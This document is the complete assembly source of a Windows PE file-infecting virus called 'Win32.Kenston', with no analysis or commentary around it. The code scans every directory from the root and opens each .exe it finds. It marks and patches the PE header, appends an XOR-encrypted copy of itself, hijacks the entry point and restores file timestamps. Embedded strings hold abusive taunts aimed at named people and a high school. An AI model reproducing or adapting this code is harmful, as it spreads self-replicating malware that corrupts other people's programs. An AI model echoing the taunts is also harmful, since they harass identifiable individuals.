Win32.Kenston .386 locals jumps .model flat, STDCALL extrn ExitProcess : PROC org 1000h .data db "This is a virus.",0 .code progstart: push 0 call ExitProcess STARTVIRUS: call relativity relativity: pop ebp cld mov eax, ebp db 2dh ;sub eax, SaveEntry dd (offset relativity- offset progstart) push eax sub ebp, offset relativity mov ecx, dword ptr [esp + 4] and ecx, 0FFF00000h mov ebx, 0BFF70000h ;Base address of win95's kernel cmp ecx, 0BFF00000h ;are we win95 or 98? je vulnerable mov ebx, 077f00000h cmp ecx, ebx ;are we NT? jne exit vulnerable: mov ecx, ebx mov edx, ecx ;Put imagebase in edx mov dword ptr [ebp + imagebase], ecx ;Save the imagebase xor eax, eax ;Clear eax mov ax, word ptr [edx + 3Ch] ;Get relocation in MZ header add ecx, eax ;Make ecx start of PE header cmp word ptr [ecx], 'EP' ;Is everything working right? jne exit mov eax, dword ptr [ecx + 120] ;Get RVA of export table add eax, edx ;Add on the Imagebase mov dword ptr [ebp + offset ExportTable], eax ;Save the exporttable's address mov ecx, dword ptr [eax + 24] ;Get number of entry's dec ecx ;Drop number by one so bottom loop works mov dword ptr [ebp + offset NumExports], ecx ;Store number of entrys mov ecx, dword ptr [eax + 28] ;Get RVA of the Address Table add ecx, edx ;Bias it by the Image Base mov dword ptr [ebp + offset AddressTable], ecx ;Save the address mov ecx, dword ptr [eax + 36] ;Get RVA of the Ordinal Table add ecx, edx ;Bias it by the Image Base mov dword ptr [ebp + offset OrdinalTable], ecx ;Save the address mov ecx, dword ptr [eax + 32] ;Get RVA of the Name Table add ecx, edx ;Bias it by the Image Base mov dword ptr [ebp + offset NameTable], ecx ;Save the address ;Upon entry: ; ecx=start of RVA String table ; edx=imagebase ; ebx=start of string of function to resolve ;Returns: ; ebx=Address of function lea ebx, [ebp + offset LoadLibraryaS] ;Function to scan for push ecx ;Save start of RVA name table call resolveexport ;Resolve LoadLibraryA pop ecx mov dword ptr [ebp + offset loadlibrarya], ebx ;Save address of loadlibrarya lea ebx, [ebp + GetProcAddressS] ;Load address of function to resolve call resolveexport ;Resolve getprocaddress mov dword ptr [ebp + offset getprocaddress], ebx ;Save getprocaddress lea esi, [ebp + offset APIList] ;Where function strings are started lea edi, [ebp + offset FindFile] ;Where to store resolved address's call maketable lea ebx, [ebp + offset DirSave] push ebx push 256 mov ebx, [ebp + offset GetCurrentDir] call ebx cmp eax, 00h je exit ;If not successfull then quit lea ebx, [ebp + offset Root] ;Go to the root directory push ebx mov ebx, dword ptr [ebp + offset SetCurrentDir] call ebx cmp eax, 01 ;Were we sucessfull? jne exit ;If not then exit call InfectFirstDirectory lea ebx, [ebp + offset DirSave] ;Go to the original directory push ebx mov ebx, dword ptr [ebp + offset SetCurrentDir] call ebx exit: pop eax ;Return to host jmp eax InfectFirstDirectory: lea ebx, [ebp + offset win32_file_data] push ebx lea ebx, [ebp + offset DirWildCard] push ebx mov ebx, dword ptr [ebp + offset FindFile] call ebx cmp eax, -1 je DoneDirScanning mov dword ptr [ebp + offset DirSearchHandle], eax ;Save our search handle cmp dword ptr [ebp + offset fileattr], 10h jne NotADir1 cmp byte ptr [ebp + offset Fullname], '.' je InfectNextDirectory call TryInfectingDir ;Try infecting the possible directory NotADir1: InfectNextDirectory: lea ebx, [ebp + offset win32_file_data] ;Where to store fileinfo push ebx push dword ptr [ebp + offset DirSearchHandle] mov ebx, dword ptr [ebp + offset FindNext] call ebx ;Find next file cmp eax, 01 jne DoneDirScanningNoneFound cmp dword ptr [ebp + offset fileattr], 10h jne NotADir2 cmp byte ptr [ebp + offset Fullname], '.' je NotADir2 call TryInfectingDir NotADir2: jmp InfectNextDirectory DoneDirScanning: push dword ptr [ebp + offset DirSearchHandle] ;Close the search handle mov eax, [ebp + offset FindClose] call eax DoneDirScanningNoneFound: ret TryInfectingDir: lea ebx, [ebp + offset FullName] ;Go to the dir we found push ebx mov ebx, dword ptr [ebp + offset SetCurrentDir] call ebx cmp eax, 01 ;Was it really a directory? jne NotaDirectory ;If not dont infect it or drop out of it call FindFirstFile push dword ptr [ebp + offset DirSearchHandle] call InfectFirstDirectory pop dword ptr [ebp+ offset DirSearchHandle] lea ebx, [ebp + offset DotDot] ;We are going to the previous dir push ebx mov ebx, dword ptr [ebp + offset SetCurrentDir] call ebx NotaDirectory: ret FindFirstFile: lea ebx, [ebp + offset win32_file_data] ;Where file info goes push ebx lea ebx, [ebp + offset EXEWildcard] ;What to search for push ebx mov ebx, dword ptr [ebp + offset FindFile] ;Find first file call ebx cmp eax, -1 ;Error? je ExitScanning mov dword ptr [ebp + offset SearchHandle], eax ;Save search handle jmp check_file FindNextFile: lea ebx, [ebp + offset win32_file_data] ;Where to store fileinfo push ebx push dword ptr [ebp + offset SearchHandle] ;Saved search handle mov ebx, dword ptr [ebp + offset FindNext] call ebx ;Find next file cmp eax, 01 jne DoneScanning check_file: push 0 push 20h push 3 ;Open existing file push 0 push 0 push 80000000h + 40000000h ;Open for reading and writing lea ebx, [ebp + offset fullname] push ebx mov ebx, dword ptr [ebp + offset Createfile] call ebx cmp eax, -1 ;Was there any error? je FindNextFile mov dword ptr [ebp + FileHandle], eax ;Save file handle xor eax, eax lea edi, [ebp + offset WorkBuffer + 56] ;Go to memory to initalize stosd stosd ;This fixes a very lame bug, It should really zero out the ;whole workbuffer before each file ;is read but since its a runtime virus its written ;for efficency. mov edx, 63 ;Read in first 63 bytes lea ecx, [ebp + offset WorkBuffer] ;Buffer we read into call Read_file cmp dword ptr [ebp + offset BytesRead], 63 jb TryNext ;Did we read in enough? lea ebx, [ebp + offset WorkBuffer] cmp word ptr [ebx], 'ZM' ;Is it an exe? jne TryNext ;If it isnt scan next file add ebx, 3Bh ;Go to the infection marker cmp byte ptr [ebx], 'a' ;are we infected already? je TryNext ;If so try next file inc ebx ;Point to relocation mov edx, dword ptr [ebx] ;Read the relocation mov dword ptr [ebp + offset MZReloc], edx ;Save the relocation call Set_Pointer ;Set file pointer to PE header cmp eax, 0FFFFFFFFh je TryNext mov edx, 120 ;Try to read in first 120 bytes of PE Header lea ecx, [ebp + offset WorkBuffer] ;Buffer we read into call Read_file cmp dword ptr [ebp + offset BytesRead], 120 jne TryNext ;Did we read in enough? cmp word ptr [ebp + offset WorkBuffer], 'EP' ;Are we in in the peheader? jne TryNext mov ebx, dword ptr [ebp + offset HeaderSze] ;Get the HeaderSize sub ebx, dword ptr [ebp + offset MZReloc] ;Subtract the MZ header mov dword ptr [ebp + offset HeaderSize], ebx ;Save the PE header's size cmp ebx, 3000 ;Are we going to overflow our memory? ja TryNext push ebx ;Save number of bytes to read in mov edx, dword ptr [ebp + offset MZReloc] ;Reset pointer back to the peheader call Set_Pointer cmp eax, 0FFFFFFFFh je TryNext pop edx ;Try to read in HeaderSize bytes lea ecx, [ebp + offset WorkBuffer] ;Buffer we read into call Read_file mov ebx, dword ptr [ebp + offset Headersize] ;How many bytes should have been read? cmp ebx, dword ptr [ebp + offset BytesRead] jne TryNext ;Did we read in enough? xor ecx, ecx mov cx, word ptr [ebp + offset NumObjects] ;Read in number of objects cmp cx, 00h ;Are there objects? je TryNext xor ebx, ebx mov bx, word ptr [ebp + offset NTHeaderSze] ;Read in the NTHeaderSize add ebx, 24 ;Add on the rest lea edx, dword ptr [ebp + offset WorkBuffer] ;Workbuffer + NTHeadersize + 24 = start of object table add edx, ebx ;Locate the object table push edx ;Save start of object table xor edx, edx mov eax, ecx ;Handoff # of objects mov ecx, 40 ;Each object is 40 bytes long mul ecx ;# objects * 40 sub eax, 40 ;Backtrack to start of last object pop edx ;Make edx the start of the object table in memory add edx, eax ;Point edx to last object mov ebx, dword ptr [edx + 20] ;Load the Physical Offset push ebx ;Save for use with virtual size mov eax, dword ptr [edx + 16] ;Load the Physical Size add ebx, eax ;Add them together mov edi, dword ptr [ebp + offset FileSize] ;Wont work if file is larger than 4.3 gigs...oh well add edi, (offset EndVirus - offset StartVirus) + (offset Encryptionframe - offset Encrypt) ;Put on the virussize of our virus in memory sub edi, ebx ;Determine distance from end of virus to old end of object add eax, edi ;Make our new physical size mov ebx, eax sub ebx, (offset EndVirus- offset StartVirus) + (offset Encryptionframe - offset Encrypt) mov esi, dword ptr [edx + 12] ;Get RVA for determining entrypointRVA add esi, ebx ;Find out our entrypointRVA mov dword ptr [ebp + offset VirusRVA], esi ;Save the virus's RVA add esi, dword ptr [ebp + offset ImgBase] ;Make the Entrypoint RVA the EntrypointVA add esi, (offset EncryptionFrame - offset Encrypt) ;Make it point to the encrypted virus in memory mov dword ptr [ebp + offset VirusVA], esi ;Save the VA for later mov ecx, dword ptr [ebp + offset FileAlign] ;Get our alignment value ; call File_Align ;Aligns eax mov dword ptr [edx + 16], eax ;Save our new physical size pop ebx ;Load the physical offset mov eax, dword ptr [edx + 8] ;Load the virtual size add ebx, eax ;Determine end of virtual space mov edi, dword ptr [ebp + offset FileSize] add edi, (offset BufferEnd - offset StartVirus) + (offset EncryptionFrame - offset Encrypt) ;Add the virus and its heap to it sub edi, ebx ;Determine distance between end of virus's heap and end of virtual space add edi, eax ;Make our virtual size mov dword ptr [edx + 8], edi ;Save our new virtualsize mov ecx, dword ptr [edx + 12] ;Get the objects RVA add ecx, edi ;Make our new ImageSize mov dword ptr [ebp + offset ImageSize], ecx ;Save our new Imagesize mov dword ptr [edx + 36], 0E0000040h ;Fix the flags ;We do all the dispatcher and loading shit here mov ecx, dword ptr [ebp + offset EntrypointRVA] mov eax, dword ptr [ebp + offset VirusRVA] mov dword ptr [ebp + offset EntrypointRVA], eax sub eax, ecx add eax, (offset relativity - offset startvirus) + (offset EncryptionFrame - offset Encrypt) ;Makeup for the call instruction mov dword ptr [ebp + offset SaveEntry], eax mov edx, 3Bh ;Offset we write marker byte at call Set_Pointer ;Go to place to write marker mov ebx, 1h ;Write one byte lea ecx, dword ptr [ebp + offset InfectionMarker] ;The byte to write call Write_File ;Write the infection marker mov edx, dword ptr [ebp + offset MZReloc] call Set_Pointer ;Goto the start of the peheader mov ebx, dword ptr [ebp + offset BytesRead] ;How much to write lea ecx, [ebp + offset WorkBuffer] ;Write our modified PE header call Write_File ;Write it! lea esi, [ebp + offset StartVirus] ;Copy the virus to the work buffer to encrypt lea edi, [ebp + offset WorkBuffer] ;Where to copy it mov dword ptr [ebp + offset StartEncrypt], edi ;We use this below mov ecx, (offset EndVirus - offset StartVirus) ;How much to copy rep movsb inc byte ptr [ebp + offset Key] ;Change the key Call Encrypt ;Encrypt our code mov ebx, dword ptr [ebp + VirusVA] ;Get our Entrypoint VA mov dword ptr [ebp + offset StartEncrypt], ebx ;Store it in the routine xor edx,edx call Set_EOF ;Go to EOF mov ebx, (offset EncryptionFrame - offset Encrypt) ;Size of encryption routine to write lea ecx, [ebp + offset Encrypt] ;Write encryption routine call Write_File mov ebx, (offset EndVirus - offset StartVirus) ;Size of the virus to write lea ecx, [ebp + offset WorkBuffer] ;Where the encrypted virus is in memory call Write_File ;Write the virus lea ebx, [ebp + offset LastWriteTime] ;Get ptr to last writetime push ebx sub ebx,8 ;Point it to lastaccesstime push ebx sub ebx, 8 ;Point it to createtime push ebx push dword ptr [ebp + offset FileHandle] ;Push on the file handle mov ebx, dword ptr [ebp + offset SetFileTime] call ebx ;Change the file's times call Close_File DoneScanning: push dword ptr [ebp + offset SearchHandle] mov eax, [ebp + offset FindClose] call eax ExitScanning: ret TryNext: call Close_File jmp FindNextFile Read_File: push 0 lea ebx, [ebp + offset BytesRead] ;Where to put # of bytes read push ebx push edx ;Number of bytes to read push ecx ;Address of buffer push dword ptr [ebp + offset FileHandle] mov ebx, dword ptr [ebp + offset ReadFile] call ebx ;Read the file ret Write_File: push 0 lea eax, [ebp + offset BytesWritten] push eax ;Where to return # of bytes written push ebx ;# of bytes to write push ecx ;Where to write from push dword ptr [ebp + offset FileHandle] mov ebx, dword ptr [ebp + offset WriteFile] call ebx ret ;Upon Entry: ; edx=New actual address in file Set_EOF: push 02h jmp jumpover Set_Pointer: push 00 jumpover: push 0 push edx ;Where to go in file push dword ptr [ebp + offset FileHandle] mov ebx, [ebp + offset SetFilePointer] call ebx ret File_Align: ;Upon entry ecx = alignment value ;eax = Size to process ;eax returns aligned size push edx xor edx, edx div ecx inc eax mul ecx pop edx ret Close_File: push dword ptr [ebp + offset FileHandle] mov eax, dword ptr [ebp + offset CloseFile] call eax ;Close the file ret ;Upon entry: ; esi=Function string table. ; edi=Our address table. maketable: lea ebx, [ebp + offset loadlibrarya] push esi ;Next in string table call dword ptr [ebx] ;call loadlibrarya mov edx, eax ;Save module handle loopuntilnull: inc esi cmp byte ptr [esi], 00h jne loopuntilnull ;loop until at end of string inc esi cmp byte ptr [esi], 01h ;Are we on last loop? je donelooping lea ebx, [ebp + offset GetProcAddress] push edx push esi ;pointer to function name push edx ;base address of dll call dword ptr [ebx] ;Getprocaddress in import table pop edx stosd jmp loopuntilnull donelooping: ret resolveexport: ;Upon entry: ; ecx=start of RVA String table ; edx=imagebase ; ebx=start of string of function to resolve ;Returns: ; ebx=Address of function xor edi,edi scanstring: mov esi, dword ptr [ecx] ;Load RVA of string to scan add esi, edx ;Bias it by the Imagebase push ebx ;Bad way to save ebx for later use scanloop: lodsb cmp al, 00h ;Is it a null character? je foundstring cmp byte ptr [ebx], al ;Does the character match? jne scannext ;If not scan next string inc ebx ;Advance the byte we are ;scanning for. jmp scanloop scannext: pop ebx add ecx, 4 ;Move it to the next export? inc edi ;Increment the counter cmp dword ptr [ebp + NumExports], edi ;Are we on last export? je exit ;Abort if out of exports jmp scanstring foundstring: pop ebx ;Keep the stack nice and neat add edi, edi ;Multiply by 2 because Ordinal ;Table is 16 bits mov ebx, dword ptr [ebp + OrdinalTable] add edi, ebx ;Point edi to getprocaddress's entry xor ebx, ebx mov bx, word ptr [edi] ;Get 16bit ordinal number lea ebx, [ebx * 4] ;Multiply by 4 because the Address ;table is made of double words. mov esi, dword ptr [ebp + AddressTable] add esi, ebx ;Point esi to RVA in addresstable mov ebx, dword ptr [esi] ;Move RVA to ebx add ebx, edx ;Offset it with the imagebase ret Encrypt: mov ecx, (offset EndVirus - offset StartVirus) db 0BBh ;Mov ebx, StartEncrypt dd 000000000h db 0B0h ;mov al, Key db 00h XorLoop: xor byte ptr [ebx], al inc ebx dec ecx cmp ecx, 00h jne XorLoop EncryptionFrame: ret STARTDATA: ;We use these to find functions in KERNEL32.DLL's export table LoadLibraryAS db "LoadLibraryA" GetProcAddressS db "GetProcAddress" ;These are the functions we need to get the address's of: APIList: db "KERNEL32",0 db "FindFirstFileA",0 db "FindNextFileA",0 db "FindClose",0 db "SetFileAttributesA",0 db "SetFileTime",0 db "CreateFileA",0 db "ReadFile",0 db "WriteFile",0 db "SetFilePointer",0 db "CloseHandle",0 db "SetCurrentDirectoryA",0 db "GetCurrentDirectoryA",0,01h ;01h stops the looking up db "Boles and Manning are arrogant facists." db " They have no computer sk1llz and KENSTON HIGH SCHOOL's" db " computers are 0wn3d. I AM BACK KOONS YOU MOTHERFUCKER " db "dowN wiTh KenSTON..... yOU tRIED tO rID yOUrSELf oF mE BefoRE" db "bUT fAILED" db "HAHAHAHAHAHAHAHAHAHAHAHAHAHAHA" DirWildcard db "*.",0 EXEWildcard db "*.exe",0 InfectionMarker db "a" DotDot db "..",0 root db "",0 ENDVIRUS: ;These are addresses already offseted by the Image base when saved ImageBase dd 1 dup (?) ExportTable dd 1 dup (?) AddressTable dd 1 dup (?) NameTable dd 1 dup (?) OrdinalTable dd 1 dup (?) NumExports dd 1 dup (?) GetProcAddressCall dd 1 dup (?) ;These are used in infecting files BytesWritten dd 1 dup (?) SearchHandle dd 1 dup (?) DirSearchHandle dd 1 dup (?) FileHandle dd 1 dup (?) BytesRead dd 1 dup (?) MZReloc dd 1 dup (?) HeaderSize dd 1 dup (?) NTHeaderSize dd 1 dup (?) VirusRVA dd 1 dup (?) InfectCounter dd 1 dup (?) VirusVA dd 1 dup (?) ;Place to store the two routines used to look up the rest LoadLibraryA dd 1 dup (?) GetProcAddress dd 1 dup (?) ;This becomes a table of these functions address's FindFile dd 1 dup (?) FindNext dd 1 dup (?) FindClose dd 1 dup (?) SetAttrib dd 1 dup (?) SetFileTime dd 1 dup (?) CreateFile dd 1 dup (?) ReadFile dd 1 dup (?) WriteFile dd 1 dup (?) SetFilePointer dd 1 dup (?) CloseFile dd 1 dup (?) SetCurrentDir dd 1 dup (?) GetCurrentDir dd 1 dup (?) DirSave db 256 dup (?) win32_file_data: fileattr dd 1 dup (?) createtime dd 2 dup (?) lastaccesstime dd 2 dup (?) lastwritetime dd 2 dup (?) dd 1 dup (?) filesize dd 1 dup (?) resv dd 2 dup (?) fullname db 256 dup (?) realname db 256 dup (?) WorkBuffer: Signature dd 1 dup (?) Cputype dw 1 dup (?) NumObjects dw 1 dup (?) dd 3 dup (?) NtHeaderSze dw 1 dup (?) Flags dw 1 dup (?) dd 4 dup (?) EntrypointRVA dd 1 dup (?) dd 2 dup (?) ImgBase dd 1 dup (?) Objectalign dd 1 dup (?) Filealign dd 1 dup (?) dd 4 dup (?) Imagesize dd 1 dup (?) Headersze dd 1 dup (?) db 3000 dup (?) BufferEnd: ends end STARTVIRUS